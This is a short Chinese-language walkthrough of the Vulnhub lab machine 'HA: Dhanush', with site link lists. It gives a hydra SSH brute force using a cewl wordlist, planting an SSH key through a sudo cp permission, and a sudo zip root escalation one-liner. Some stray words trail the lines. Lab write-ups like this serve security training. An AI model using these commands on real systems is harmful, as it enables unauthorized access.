HA: Dhanush Vulnhub Walkthrough
靶機下載連接:bash
https://www.vulnhub.com/entry/ha-dhanush,396/ssh
主機掃描:blog
主機端口掃描:ip
HTTP目錄爬取test
使用dirb dirsearch 爬取均未發現可利用的目錄登錄
另外看到ssh端口開啓了,進行網頁爬取字典生成進行爆破rsa
cewl http://10.10.202.147 -w dict.txt權限
╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr下載
嘗試複製passwd文件提示無權限,用戶sarangy用戶才具備cp的root權限執行command
這裏的思路:
pinak用戶生成祕鑰對,而後使用過cp命令複製到用戶sarang用戶的.ssh目錄爲authorized_keys文件
而後ssh -i rsa_id 進行登陸,嘗試提權
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
zip命令提權
sudo zip /tmp/test.zip /home/sarang/test -T --unzip-command="sh -c /bin/bash"
OVER!
相關文章
- 1. HA: Dhanush Vulnhub Walkthrough
- 2. HA: Chakravyuh Vulnhub Walkthrough
- 3. HA: Chanakya Vulnhub Walkthrough
- 4. HA Joker Vulnhub Walkthrough
- 5. HA: ISRO Vulnhub Walkthrough
- 6. vulnhub dhanush
- 7. Sunset-Sunrise: Vulnhub Walkthrough
- 8. Sunset: dusk: Vulnhub Walkthrough
- 9. Girlfreind:1 Vulnhub Walkthrough
- 10. Happycorp:1 Vulnhub Walkthrough
- 更多相關文章...
- • OceanBase數據庫入門教程 - NoSQL教程
- • PHP 運算符 - PHP教程
- • 常用的分佈式事務解決方案
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. HA: Dhanush Vulnhub Walkthrough
- 2. HA: Chakravyuh Vulnhub Walkthrough
- 3. HA: Chanakya Vulnhub Walkthrough
- 4. HA Joker Vulnhub Walkthrough
- 5. HA: ISRO Vulnhub Walkthrough
- 6. vulnhub dhanush
- 7. Sunset-Sunrise: Vulnhub Walkthrough
- 8. Sunset: dusk: Vulnhub Walkthrough
- 9. Girlfreind:1 Vulnhub Walkthrough
- 10. Happycorp:1 Vulnhub Walkthrough